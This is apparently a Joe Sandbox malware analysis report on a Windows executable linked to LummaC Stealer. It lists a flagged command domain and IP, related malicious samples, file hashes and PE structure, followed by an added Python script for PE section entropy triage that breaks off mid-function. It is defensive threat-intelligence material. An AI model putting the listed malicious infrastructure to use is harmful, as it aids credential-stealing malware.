https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://toppyneedus.biz/apip | 4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006CB000.00000004.00000020.00020000.00000000.sdmp | false
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://toppyneedus.biz/riq4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://crl.micro4JPKDcwtDo.exe, 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1363898461.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1401075229.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://toppyneedus.biz/pi4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.c.lencr.org/04JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/04JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://toppyneedus.biz/94JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://toppyneedus.biz/4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/products/firefoxgro.all4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://toppyneedus.biz/h4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.149.66 | toppyneedus.biz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1599847
Start date and time:2025-01-26 15:47:01 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:4JPKDcwtDo.exe
renamed because original name is a hash value
Original Sample Name:5530e06db7d6818359bef99c53ebef57.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@2/5@3/1
EGA Information:Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.45, 4.175.87.197, 40.126.32.138, 20.12.23.50
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 4JPKDcwtDo.exe, PID 7120 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:47:57 | API Interceptor | 10x Sleep call for process: 4JPKDcwtDo.exe modified
10:58:00 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match:172.67.149.66
Associated Sample Name / URL | Detection | Threat Name
p199AjsEFs.exe | malicious | Amadey, LummaC Stealer, Stealc
VbEfsnL4cp.exe | malicious | LummaC Stealer
4WzIkJRbcc.exe | malicious | LummaC Stealer
random.exe | malicious | LummaC Stealer
file.dll | malicious | LummaC Stealer, Matanbuchus
5hNOfmF.exe | malicious | LummaC Stealer
5hNOfmF.exe | malicious | LummaC Stealer
I5D7Y9o1R1.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, RedLine
qaTIoEvGuA.exe | malicious | Amadey, Babadeda, Credential Flusher, LummaC Stealer, Stealc
FC0KPz6vXH.exe | malicious | Amadey, Babadeda, Credential Flusher, DarkTortilla, LummaC Stealer, Stealc
Match:toppyneedus.biz
Associated Sample Name / URL | Detection | Threat Name | Context
p199AjsEFs.exe | malicious | Amadey, LummaC Stealer, Stealc | 172.67.149.66
VbEfsnL4cp.exe | malicious | LummaC Stealer | 172.67.149.66
2E02vIiMfd.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | 104.21.29.142
grcKLMutRS.exe | malicious | LummaC Stealer | 104.21.29.142
4WzIkJRbcc.exe | malicious | LummaC Stealer | 172.67.149.66
2r81fhbT6k.exe | malicious | LummaC Stealer | 104.21.29.142
random.exe | malicious | LummaC Stealer | 172.67.149.66
UK6dGWkIJK.exe | malicious | LummaC Stealer | 104.21.29.142
gQE0KK1bN8.exe | malicious | LummaC Stealer, PureLog Stealer | 104.21.29.142
file.dll | malicious | LummaC Stealer, Matanbuchus | 172.67.149.66
Match:CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
p199AjsEFs.exe | malicious | Amadey, LummaC Stealer, Stealc | 172.67.149.66
VbEfsnL4cp.exe | malicious | LummaC Stealer | 172.67.149.66
2E02vIiMfd.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | 104.21.29.142
grcKLMutRS.exe | malicious | LummaC Stealer | 104.21.56.70
4WzIkJRbcc.exe | malicious | LummaC Stealer | 172.67.149.66
2r81fhbT6k.exe | malicious | LummaC Stealer | 104.21.56.70
ShfT0a6CFx.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.31.177
tZZIAvJ2Tf.exe | malicious | XWorm | 104.20.3.235
JOWcitzTY4.exe | malicious | Unknown | 104.21.51.26
kfThaNgKJo.exe | malicious | LummaC Stealer | 104.21.32.1
Match:a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
p199AjsEFs.exe | malicious | Amadey, LummaC Stealer, Stealc | 172.67.149.66
VbEfsnL4cp.exe | malicious | LummaC Stealer | 172.67.149.66
2E02vIiMfd.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | 172.67.149.66
grcKLMutRS.exe | malicious | LummaC Stealer | 172.67.149.66
4WzIkJRbcc.exe | malicious | LummaC Stealer | 172.67.149.66
2r81fhbT6k.exe | malicious | LummaC Stealer | 172.67.149.66
ShfT0a6CFx.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 172.67.149.66
2cYxf6R4KS.exe | malicious | LummaC, Amadey | 172.67.149.66
kfThaNgKJo.exe | malicious | LummaC Stealer | 172.67.149.66
sUaVKMWJfD.exe | malicious | LummaC | 172.67.149.66
No context
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.0283699079067659
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:cyFT8GUsnhpl7EfKQXIDcQ1c6McE7cw3NYrx+HbHg/PB6HeaOy1E45WAU6NCUtWo:d8GUr0rIx5JjG3mJIzuiFAZ24IO8iZ
                                                                                                  MD5:C1F2ADE798E9F747ECD2BDA5B8F1133E
                                                                                                  SHA1:62E1E0445FE572B521A5DFB576522855FC5CD0FF
                                                                                                  SHA-256:3E653F7A0E099054DF9A37732C037F71DA637F3B13A148DB5B1B398FFBC3BDB5
                                                                                                  SHA-512:CC7B2E9AE56F93247C24D39D0D17F555D4C6DEF58825BC39BFAC8C2E167D2C0AADDB413B7202128DCB59BD781E36781E26E4C4C7EC974BEA69224B522782A78E
                                                                                                  Malicious:true
                                                                                                  Reputation:low
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 15 streams, Sun Jan 26 14:48:12 2025, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):48890
                                                                                                  Entropy (8bit):2.577551863525538
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ljlyXbMzY2SGKeZzeOZ1BSSnqh/LYqC5gNczif2D7/cqxl7lnuCXH1/2sLSb+:sMzY2SGKeZzZrB7EYoCrttzXVJSb+
                                                                                                  MD5:5126249BABB8639F168B5BD7DCBF5C7E
                                                                                                  SHA1:47730E341A34710AE12C00BCC85E2E5A2E3AA438
                                                                                                  SHA-256:6217260ADCD576D8E4C96AA3AFA271468582858B494006C3ED02DAA7E484D05B
                                                                                                  SHA-512:774F698B46724AADFDA6A82F033ABA92DB955F0F6654D3F257D42661A6C11FBFE31AE80626A99E41FA7C1FFE507E07486FAF3D41CE0BBB4BC1065ED600C757B2
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8324
                                                                                                  Entropy (8bit):3.6990357664182154
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:R6l7wVeJXj6Ixg6YNpSU+egmfppApDw89bgYsfNAm:R6lXJz6IW6YzSU+egmfp+gLff
                                                                                                  MD5:2B3C76D210D7BF03BC9E706ABF219C24
                                                                                                  SHA1:8C5DB74D41C7681B28ED01F161BF31B5D17A4D6A
                                                                                                  SHA-256:F8E7BCA38678D5A9EF04B871EEBFF06C0CBE8E28F2582033E6510408B0A71CE6
                                                                                                  SHA-512:24B2161F46EB51BD5EA4239A9A514BE17CBB2956CC7B7E5D6B800E36E2EF1C8DC332CFC705FC436FDC9BC4055DB3CEE434E606BCF8B41F08AD650C8568EF7BDD
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.0.<./.P.i.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4579
                                                                                                  Entropy (8bit):4.475600652360879
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwWl8zsrJg77aI952WpW8VYcYm8M4J4YFu+q8cPHN0A0Wd:uIjfFI7DX7VYJmJytWd
                                                                                                  MD5:B540B25D56A7D2A16016B7DD663753D9
                                                                                                  SHA1:5F82550C80047567E0648000351EB82B5557D5B7
                                                                                                  SHA-256:62BB4652A8F6B9A9ADE987A6E9E37AB52D5EF86B9721AAB027A2B5AA149D9EAA
                                                                                                  SHA-512:B7B2D997672CE9AF0EDDA101AD04FB0DD88E159F4DA431FC0F290C84D6219909DE82BA0DBA6C0254408A9ACFBCFAC731B752FF8999121031EC655E13FEBF3210
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="692990" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1835008
                                                                                                  Entropy (8bit):4.416653773529352
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:hcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNp5+:+i58oSWIZBk2MM6AFB7o
                                                                                                  MD5:870F21E95D3BD9195535A694D2FADD46
                                                                                                  SHA1:280A76E6D730FC50D96F6778E979E9160D56161E
                                                                                                  SHA-256:0BAB4D81556B0CF4979197140E702400CACEBBE3652468F8D690C4706434606E
                                                                                                  SHA-512:8BF9894C66F5A70CC7D07C0B2ACB122BED9932079C7BDB0B772EF47889A77C7DE72694B9FE2533D9A5B4F0543F2E63003FB00C40C5C5B0AA96E92B9FFD8C1DA6
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&'hR.p.................................................................................................................................................................................................................................................................................................................................................f........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):6.669497053557433
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:4JPKDcwtDo.exe
                                                                                                  File size:400'384 bytes
                                                                                                  MD5:5530e06db7d6818359bef99c53ebef57
                                                                                                  SHA1:d43255e222c09a14f7e2cc205df120af573a15d2
                                                                                                  SHA256:d878e20cbf86109866c7fbd2ab840f58eb0927c526feed708b50d97c5bb9eff8
                                                                                                  SHA512:13b71094147451fd3419dc5e9ab735e8bf49debeeb1fea222275b10c6aa6aadf006650b91c2f4eca67f70251ba1acacf0a8262090c5e4650b2153e6b373c9d8c
                                                                                                  SSDEEP:3072:1XtJ94LTt1ffUPNCi/ijoEUz0Qa3fSbPbNh8um6fLea54bY94HPy31lcqpo9fq5t:19JmPf9obYrfSbjguz5J9Oy3Dch9
                                                                                                  TLSH:E6845B1282A17D54EA265B729E1EC6E8670EF7E18F897BB532189ADF0CB0171C173F50
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`8...VA..VA..VA+N.A..VA.S.A..VA.S.A..VA.S.A..VA..-A..VA..WA..VA.S.A..VA.S.A..VA.S.A..VARich..VA........................PE..L..
                                                                                                  Icon Hash:738733b18ba383e4
                                                                                                  Entrypoint:0x401926
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6609CEBF [Sun Mar 31 20:59:43 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:c1ad5d94a080d1479358f349f9710f1a
                                                                                                  Instruction
                                                                                                  call 00007FA60D5810DEh
                                                                                                  jmp 00007FA60D57D01Dh
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 00000328h
                                                                                                  mov dword ptr [004472B0h], eax
                                                                                                  mov dword ptr [004472ACh], ecx
                                                                                                  mov dword ptr [004472A8h], edx
                                                                                                  mov dword ptr [004472A4h], ebx
                                                                                                  mov dword ptr [004472A0h], esi
                                                                                                  mov dword ptr [0044729Ch], edi
                                                                                                  mov word ptr [004472C8h], ss
                                                                                                  mov word ptr [004472BCh], cs
                                                                                                  mov word ptr [00447298h], ds
                                                                                                  mov word ptr [00447294h], es
                                                                                                  mov word ptr [00447290h], fs
                                                                                                  mov word ptr [0044728Ch], gs
                                                                                                  pushfd
                                                                                                  pop dword ptr [004472C0h]
                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                  mov dword ptr [004472B4h], eax
                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                  mov dword ptr [004472B8h], eax
                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                  mov dword ptr [004472C4h], eax
                                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                                  mov dword ptr [00447200h], 00010001h
                                                                                                  mov eax, dword ptr [004472B8h]
                                                                                                  mov dword ptr [004471B4h], eax
                                                                                                  mov dword ptr [004471A8h], C0000409h
                                                                                                  mov dword ptr [004471ACh], 00000001h
                                                                                                  mov eax, dword ptr [00446008h]
                                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                                  mov eax, dword ptr [0044600Ch]
                                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                                  call dword ptr [000000D8h]
                                                                                                  Programming Language:
                                                                                                  • [C++] VS2008 build 21022
                                                                                                  • [ASM] VS2008 build 21022
                                                                                                  • [ C ] VS2008 build 21022
                                                                                                  • [IMP] VS2005 build 50727
                                                                                                  • [RES] VS2008 build 21022
                                                                                                  • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x44b1c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb3000 | 0x18208 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x43000 | 0x198 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x41710 | 0x41800 | 829bb93d31cd2773a7f15bd3ce69b393 | False | 0.8269546159351145 | data | 7.433590009651865 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x43000 | 0x2444 | 0x2600 | 653859e6cc6c4a478f73bc157a2b2c24 | False | 0.36543996710526316 | data | 5.353629372033153 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x46000 | 0x6c8e0 | 0x5600 | 134411ba5e3cdaf22aff6266102b03ac | False | 0.043740915697674417 | data | 0.5266503152859804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xb3000 | 0x18208 | 0x18400 | 358d317c61d0482b9cbb56388c22f000 | False | 0.3354139819587629 | data | 4.243766736540801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
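The section table and the header flags above are what the report's "Detected unpacking" signatures rest on: .text has an entropy of 7.43 in a section whose raw size matches its virtual size (packed or encrypted code), .data declares a VirtualSize of 0x6c8e0 against only 0x5600 bytes on disk (the loader zero-fills the remainder, leaving room for an unpacked payload), and RELOCS_STRIPPED together with the absence of DYNAMIC_BASE in DllCharacteristics means the image always maps at 0x400000, which is why the entry-point disassembly writes to hard-coded addresses such as 004472B0h. The Python below is an added example, not Joe Sandbox's code and not the sample's bytes: it parses a PE32 section table, computes the same 8-bit Shannon entropy the report lists, and applies those three checks. It runs over a constructed file whose header fields and section geometry (names, RVAs, VirtualSize, raw size, characteristics, timestamp, DllCharacteristics, 0x400 header size, 400,384-byte total) copy the report's values but whose section contents are synthetic filler, so the per-section MD5 and entropy values it prints differ from the report's. The 7.0 entropy threshold, the 4:1 VirtualSize-to-raw-size slack factor and the "<image>" pseudo-section name are my own choices.

```python
"""PE32 section-table triage (added example; constructed input, not the sample)."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the report's 'Entropy (8bit)' measure."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe32(image: bytes) -> dict:
    """Read the COFF header, the optional-header fields needed here and all section headers."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", image, 0x3C)[0]            # e_lfanew
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", image, pe + 4)
    opt = pe + 24                                              # optional header start
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("not a PE32 image")
    image_base = struct.unpack_from("<I", image, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", image, opt + 70)[0]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        raw = image[rawptr:rawptr + rawsize]                   # bytes present on disk
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "flags": flags,
                         "md5": hashlib.md5(raw).hexdigest(),
                         "entropy": shannon_entropy(raw)})
    return {"machine": machine, "timestamp": stamp, "characteristics": chars,
            "image_base": image_base, "dll_characteristics": dll_chars,
            "sections": sections}


def triage(pe: dict, entropy_threshold: float = 7.0, slack: int = 4) -> list:
    """Return (section, tag, detail) findings; thresholds are this example's own choices."""
    out = []
    if (pe["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED) and not (
            pe["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE):
        out.append(("<image>", "fixed-base",
                    f"relocs stripped and no DYNAMIC_BASE: always maps at {pe['image_base']:#x}"))
    for s in pe["sections"]:
        exe = bool(s["flags"] & IMAGE_SCN_MEM_EXECUTE)
        wrt = bool(s["flags"] & IMAGE_SCN_MEM_WRITE)
        if exe and s["entropy"] >= entropy_threshold:
            out.append((s["name"], "high-entropy-code", f"entropy {s['entropy']:.2f}"))
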